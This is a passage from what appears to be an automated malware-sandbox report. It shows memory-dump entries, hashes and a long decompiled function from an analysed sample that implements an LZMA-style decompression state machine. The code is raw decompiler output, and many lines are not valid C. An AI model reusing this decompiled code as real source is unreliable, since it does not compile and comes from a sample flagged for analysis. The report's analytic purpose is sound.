                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                                • Instruction ID: ed496f49c15cb1a0cee1f91230a4d4bd76d3fd25087baa69d2252d5f7e71f344
                                                • Opcode Fuzzy Hash: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                                • Instruction Fuzzy Hash: 30713271E00228CFDF28DFA8C8547ADBBB1FB44305F15806AD906BB281D7785A96DF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E00406591() {
                                                				unsigned short _t531;
                                                				signed int _t532;
                                                				void _t533;
                                                				signed int _t534;
                                                				signed int _t535;
                                                				signed int _t565;
                                                				signed int _t568;
                                                				signed int _t589;
                                                				signed int* _t606;
                                                				void* _t613;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					if( *(_t613 - 0x40) != 0) {
                                                						 *(_t613 - 0x84) = 0xb;
                                                						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                						goto L132;
                                                					} else {
                                                						__eax =  *(__ebp - 0x28);
                                                						L88:
                                                						 *(__ebp - 0x2c) = __eax;
                                                						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                						L89:
                                                						__eax =  *(__ebp - 4);
                                                						 *(__ebp - 0x80) = 0x15;
                                                						__eax =  *(__ebp - 4) + 0xa68;
                                                						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                						L69:
                                                						 *(__ebp - 0x84) = 0x12;
                                                						while(1) {
                                                							L132:
                                                							 *(_t613 - 0x54) = _t606;
                                                							while(1) {
                                                								L133:
                                                								_t531 =  *_t606;
                                                								_t589 = _t531 & 0x0000ffff;
                                                								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                								if( *(_t613 - 0xc) >= _t565) {
                                                									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                									 *(_t613 - 0x40) = 1;
                                                									_t532 = _t531 - (_t531 >> 5);
                                                									 *_t606 = _t532;
                                                								} else {
                                                									 *(_t613 - 0x10) = _t565;
                                                									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                								}
                                                								if( *(_t613 - 0x10) >= 0x1000000) {
                                                									goto L139;
                                                								}
                                                								L137:
                                                								if( *(_t613 - 0x6c) == 0) {
                                                									 *(_t613 - 0x88) = 5;
                                                									L170:
                                                									_t568 = 0x22;
                                                									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                									_t535 = 0;
                                                									L172:
                                                									return _t535;
                                                								}
                                                								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                								L139:
                                                								_t533 =  *(_t613 - 0x84);
                                                								while(1) {
                                                									 *(_t613 - 0x88) = _t533;
                                                									while(1) {
                                                										L1:
                                                										_t534 =  *(_t613 - 0x88);
                                                										if(_t534 > 0x1c) {
                                                											break;
                                                										}
                                                										switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
                                                											case 0:
                                                												if( *(_t613 - 0x6c) == 0) {
                                                													goto L170;
                                                												}
                                                												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                												_t534 =  *( *(_t613 - 0x70));
                                                												if(_t534 > 0xe1) {
                                                													goto L171;
                                                												}
                                                												_t538 = _t534 & 0x000000ff;
                                                												_push(0x2d);
                                                												asm("cdq");
                                                												_pop(_t570);
                                                												_push(9);
                                                												_pop(_t571);
                                                												_t609 = _t538 / _t570;
                                                												_t540 = _t538 % _t570 & 0x000000ff;
                                                												asm("cdq");
                                                												_t604 = _t540 % _t571 & 0x000000ff;
                                                												 *(_t613 - 0x3c) = _t604;
                                                												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                													L10:
                                                													if(_t612 == 0) {
                                                														L12:
                                                														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                														goto L15;
                                                													} else {
                                                														goto L11;
                                                													}
                                                													do {
                                                														L11:
                                                														_t612 = _t612 - 1;
                                                														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                													} while (_t612 != 0);
                                                													goto L12;
                                                												}
                                                												if( *(_t613 - 4) != 0) {
                                                													GlobalFree( *(_t613 - 4));
                                                												}
                                                												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                												 *(_t613 - 4) = _t534;
                                                												if(_t534 == 0) {
                                                													goto L171;
                                                												} else {
                                                													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                													goto L10;
                                                												}
                                                											case 1:
                                                												L13:
                                                												__eflags =  *(_t613 - 0x6c);
                                                												if( *(_t613 - 0x6c) == 0) {
                                                													 *(_t613 - 0x88) = 1;
                                                													goto L170;
                                                												}
                                                												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                												_t45 = _t613 - 0x48;
                                                												 *_t45 =  *(_t613 - 0x48) + 1;
                                                												__eflags =  *_t45;
                                                												L15:
                                                												if( *(_t613 - 0x48) < 4) {
                                                													goto L13;
                                                												}
                                                												_t546 =  *(_t613 - 0x40);
                                                												if(_t546 ==  *(_t613 - 0x74)) {
                                                													L20:
                                                													 *(_t613 - 0x48) = 5;
                                                													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                													goto L23;
                                                												}
                                                												 *(_t613 - 0x74) = _t546;
                                                												if( *(_t613 - 8) != 0) {
                                                													GlobalFree( *(_t613 - 8)); // executed
                                                												}
                                                												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                												 *(_t613 - 8) = _t534;
                                                												if(_t534 == 0) {
                                                													goto L171;
                                                												} else {
                                                													goto L20;
                                                												}
                                                											case 2:
                                                												L24:
                                                												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                												 *(_t613 - 0x84) = 6;
                                                												 *(_t613 - 0x4c) = _t553;
                                                												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                												L132:
                                                												 *(_t613 - 0x54) = _t606;
                                                												goto L133;
                                                											case 3:
                                                												L21:
                                                												__eflags =  *(_t613 - 0x6c);
                                                												if( *(_t613 - 0x6c) == 0) {
                                                													 *(_t613 - 0x88) = 3;
                                                													goto L170;
                                                												}
                                                												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                												_t67 = _t613 - 0x70;
                                                												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                												__eflags =  *_t67;
                                                												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                												L23:
                                                												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                												if( *(_t613 - 0x48) != 0) {
                                                													goto L21;
                                                												}
                                                												goto L24;
                                                											case 4:
                                                												L133:
                                                												_t531 =  *_t606;
                                                												_t589 = _t531 & 0x0000ffff;
                                                												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                												if( *(_t613 - 0xc) >= _t565) {
                                                													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                													 *(_t613 - 0x40) = 1;
                                                													_t532 = _t531 - (_t531 >> 5);
                                                													 *_t606 = _t532;
                                                												} else {
                                                													 *(_t613 - 0x10) = _t565;
                                                													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                												}
                                                												if( *(_t613 - 0x10) >= 0x1000000) {
                                                													goto L139;
                                                												}
                                                											case 5:
                                                												goto L137;
                                                											case 6:
                                                												__edx = 0;
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__eax =  *(__ebp - 4);
                                                													__ecx =  *(__ebp - 0x38);
                                                													 *(__ebp - 0x34) = 1;
                                                													 *(__ebp - 0x84) = 7;
                                                													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                													while(1) {
                                                														L132:
                                                														 *(_t613 - 0x54) = _t606;
                                                														goto L133;
                                                													}
                                                												}
                                                												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                												__esi =  *(__ebp - 0x60);
                                                												__cl = 8;
                                                												__cl = 8 -  *(__ebp - 0x3c);
                                                												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                												__ecx =  *(__ebp - 0x3c);
                                                												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                												__ecx =  *(__ebp - 4);
                                                												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                												__eflags =  *(__ebp - 0x38) - 4;
                                                												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                												if( *(__ebp - 0x38) >= 4) {
                                                													__eflags =  *(__ebp - 0x38) - 0xa;
                                                													if( *(__ebp - 0x38) >= 0xa) {
                                                														_t98 = __ebp - 0x38;
                                                														 *_t98 =  *(__ebp - 0x38) - 6;
                                                														__eflags =  *_t98;
                                                													} else {
                                                														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                													}
                                                												} else {
                                                													 *(__ebp - 0x38) = 0;
                                                												}
                                                												__eflags =  *(__ebp - 0x34) - __edx;
                                                												if( *(__ebp - 0x34) == __edx) {
                                                													__ebx = 0;
                                                													__ebx = 1;
                                                													goto L61;
                                                												} else {
                                                													__eax =  *(__ebp - 0x14);
                                                													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                													__eflags = __eax -  *(__ebp - 0x74);
                                                													if(__eax >=  *(__ebp - 0x74)) {
                                                														__eax = __eax +  *(__ebp - 0x74);
                                                														__eflags = __eax;
                                                													}
                                                													__ecx =  *(__ebp - 8);
                                                													__ebx = 0;
                                                													__ebx = 1;
                                                													__al =  *((intOrPtr*)(__eax + __ecx));
                                                													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                													goto L41;
                                                												}
                                                											case 7:
                                                												__eflags =  *(__ebp - 0x40) - 1;
                                                												if( *(__ebp - 0x40) != 1) {
                                                													__eax =  *(__ebp - 0x24);
                                                													 *(__ebp - 0x80) = 0x16;
                                                													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                													__eax =  *(__ebp - 0x28);
                                                													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                													__eax =  *(__ebp - 0x2c);
                                                													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                													__eax = 0;
                                                													__eflags =  *(__ebp - 0x38) - 7;
                                                													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                													__al = __al & 0x000000fd;
                                                													__eax = (__eflags >= 0) - 1 + 0xa;
                                                													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                													__eax =  *(__ebp - 4);
                                                													__eax =  *(__ebp - 4) + 0x664;
                                                													__eflags = __eax;
                                                													 *(__ebp - 0x58) = __eax;
                                                													goto L69;
                                                												}
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x84) = 8;
                                                												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                												while(1) {
                                                													L132:
                                                													 *(_t613 - 0x54) = _t606;
                                                													goto L133;
                                                												}
                                                											case 8:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__eax =  *(__ebp - 4);
                                                													__ecx =  *(__ebp - 0x38);
                                                													 *(__ebp - 0x84) = 0xa;
                                                													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                												} else {
                                                													__eax =  *(__ebp - 0x38);
                                                													__ecx =  *(__ebp - 4);
                                                													__eax =  *(__ebp - 0x38) + 0xf;
                                                													 *(__ebp - 0x84) = 9;
                                                													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                												}
                                                												while(1) {
                                                													L132:
                                                													 *(_t613 - 0x54) = _t606;
                                                													goto L133;
                                                												}
                                                											case 9:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													goto L89;
                                                												}
                                                												__eflags =  *(__ebp - 0x60);
                                                												if( *(__ebp - 0x60) == 0) {
                                                													goto L171;
                                                												}
                                                												__eax = 0;
                                                												__eflags =  *(__ebp - 0x38) - 7;
                                                												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                												__eflags = _t259;
                                                												0 | _t259 = _t259 + _t259 + 9;
                                                												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                												goto L76;
                                                											case 0xa:
                                                												goto L0;
                                                											case 0xb:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__ecx =  *(__ebp - 0x24);
                                                													__eax =  *(__ebp - 0x20);
                                                													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                												} else {
                                                													__eax =  *(__ebp - 0x24);
                                                												}
                                                												__ecx =  *(__ebp - 0x28);
                                                												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                												goto L88;
                                                											case 0xc:
                                                												L99:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0xc;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t334 = __ebp - 0x70;
                                                												 *_t334 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t334;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												__eax =  *(__ebp - 0x2c);
                                                												goto L101;
                                                											case 0xd:
                                                												L37:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0xd;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t122 = __ebp - 0x70;
                                                												 *_t122 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t122;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												L39:
                                                												__eax =  *(__ebp - 0x40);
                                                												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                													goto L48;
                                                												}
                                                												__eflags = __ebx - 0x100;
                                                												if(__ebx >= 0x100) {
                                                													goto L54;
                                                												}
                                                												L41:
                                                												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                												__ecx =  *(__ebp - 0x58);
                                                												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                												 *(__ebp - 0x48) = __eax;
                                                												__eax = __eax + 1;
                                                												__eax = __eax << 8;
                                                												__eax = __eax + __ebx;
                                                												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                												__ax =  *__esi;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__edx = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													 *(__ebp - 0x40) = 1;
                                                													__cx = __ax >> 5;
                                                													__eflags = __eax;
                                                													__ebx = __ebx + __ebx + 1;
                                                													 *__esi = __ax;
                                                												} else {
                                                													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edx;
                                                													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                													__ebx = __ebx + __ebx;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													goto L39;
                                                												} else {
                                                													goto L37;
                                                												}
                                                											case 0xe:
                                                												L46:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0xe;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t156 = __ebp - 0x70;
                                                												 *_t156 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t156;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												while(1) {
                                                													L48:
                                                													__eflags = __ebx - 0x100;
                                                													if(__ebx >= 0x100) {
                                                														break;
                                                													}
                                                													__eax =  *(__ebp - 0x58);
                                                													__edx = __ebx + __ebx;
                                                													__ecx =  *(__ebp - 0x10);
                                                													__esi = __edx + __eax;
                                                													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                													__ax =  *__esi;
                                                													 *(__ebp - 0x54) = __esi;
                                                													__edi = __ax & 0x0000ffff;
                                                													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                													__eflags =  *(__ebp - 0xc) - __ecx;
                                                													if( *(__ebp - 0xc) >= __ecx) {
                                                														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                														__cx = __ax;
                                                														_t170 = __edx + 1; // 0x1
                                                														__ebx = _t170;
                                                														__cx = __ax >> 5;
                                                														__eflags = __eax;
                                                														 *__esi = __ax;
                                                													} else {
                                                														 *(__ebp - 0x10) = __ecx;
                                                														0x800 = 0x800 - __edi;
                                                														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                														__ebx = __ebx + __ebx;
                                                														 *__esi = __cx;
                                                													}
                                                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                													 *(__ebp - 0x44) = __ebx;
                                                													if( *(__ebp - 0x10) >= 0x1000000) {
                                                														continue;
                                                													} else {
                                                														goto L46;
                                                													}
                                                												}
                                                												L54:
                                                												_t173 = __ebp - 0x34;
                                                												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                												__eflags =  *_t173;
                                                												goto L55;
                                                											case 0xf:
                                                												L58:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0xf;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t203 = __ebp - 0x70;
                                                												 *_t203 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t203;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												L60:
                                                												__eflags = __ebx - 0x100;
                                                												if(__ebx >= 0x100) {
                                                													L55:
                                                													__al =  *(__ebp - 0x44);
                                                													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                													goto L56;
                                                												}
                                                												L61:
                                                												__eax =  *(__ebp - 0x58);
                                                												__edx = __ebx + __ebx;
                                                												__ecx =  *(__ebp - 0x10);
                                                												__esi = __edx + __eax;
                                                												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                												__ax =  *__esi;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__edi = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													_t217 = __edx + 1; // 0x1
                                                													__ebx = _t217;
                                                													__cx = __ax >> 5;
                                                													__eflags = __eax;
                                                													 *__esi = __ax;
                                                												} else {
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edi;
                                                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                													__ebx = __ebx + __ebx;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													goto L60;
                                                												} else {
                                                													goto L58;
                                                												}
                                                											case 0x10:
                                                												L109:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0x10;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t365 = __ebp - 0x70;
                                                												 *_t365 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t365;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												goto L111;
                                                											case 0x11:
                                                												goto L69;
                                                											case 0x12:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__eax =  *(__ebp - 0x58);
                                                													 *(__ebp - 0x84) = 0x13;
                                                													__esi =  *(__ebp - 0x58) + 2;
                                                													while(1) {
                                                														L132:
                                                														 *(_t613 - 0x54) = _t606;
                                                														goto L133;
                                                													}
                                                												}
                                                												__eax =  *(__ebp - 0x4c);
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                												__ecx =  *(__ebp - 0x58);
                                                												__eax =  *(__ebp - 0x4c) << 4;
                                                												__eflags = __eax;
                                                												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                												goto L130;
                                                											case 0x13:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													_t469 = __ebp - 0x58;
                                                													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                													__eflags =  *_t469;
                                                													 *(__ebp - 0x30) = 0x10;
                                                													 *(__ebp - 0x40) = 8;
                                                													L144:
                                                													 *(__ebp - 0x7c) = 0x14;
                                                													goto L145;
                                                												}
                                                												__eax =  *(__ebp - 0x4c);
                                                												__ecx =  *(__ebp - 0x58);
                                                												__eax =  *(__ebp - 0x4c) << 4;
                                                												 *(__ebp - 0x30) = 8;
                                                												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                												L130:
                                                												 *(__ebp - 0x58) = __eax;
                                                												 *(__ebp - 0x40) = 3;
                                                												goto L144;
                                                											case 0x14:
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                												__eax =  *(__ebp - 0x80);
                                                												 *(_t613 - 0x88) = _t533;
                                                												goto L1;
                                                											case 0x15:
                                                												__eax = 0;
                                                												__eflags =  *(__ebp - 0x38) - 7;
                                                												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                												__al = __al & 0x000000fd;
                                                												__eax = (__eflags >= 0) - 1 + 0xb;
                                                												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                												goto L120;
                                                											case 0x16:
                                                												__eax =  *(__ebp - 0x30);
                                                												__eflags = __eax - 4;
                                                												if(__eax >= 4) {
                                                													_push(3);
                                                													_pop(__eax);
                                                												}
                                                												__ecx =  *(__ebp - 4);
                                                												 *(__ebp - 0x40) = 6;
                                                												__eax = __eax << 7;
                                                												 *(__ebp - 0x7c) = 0x19;
                                                												 *(__ebp - 0x58) = __eax;
                                                												goto L145;
                                                											case 0x17:
                                                												L145:
                                                												__eax =  *(__ebp - 0x40);
                                                												 *(__ebp - 0x50) = 1;
                                                												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                												goto L149;
                                                											case 0x18:
                                                												L146:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0x18;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
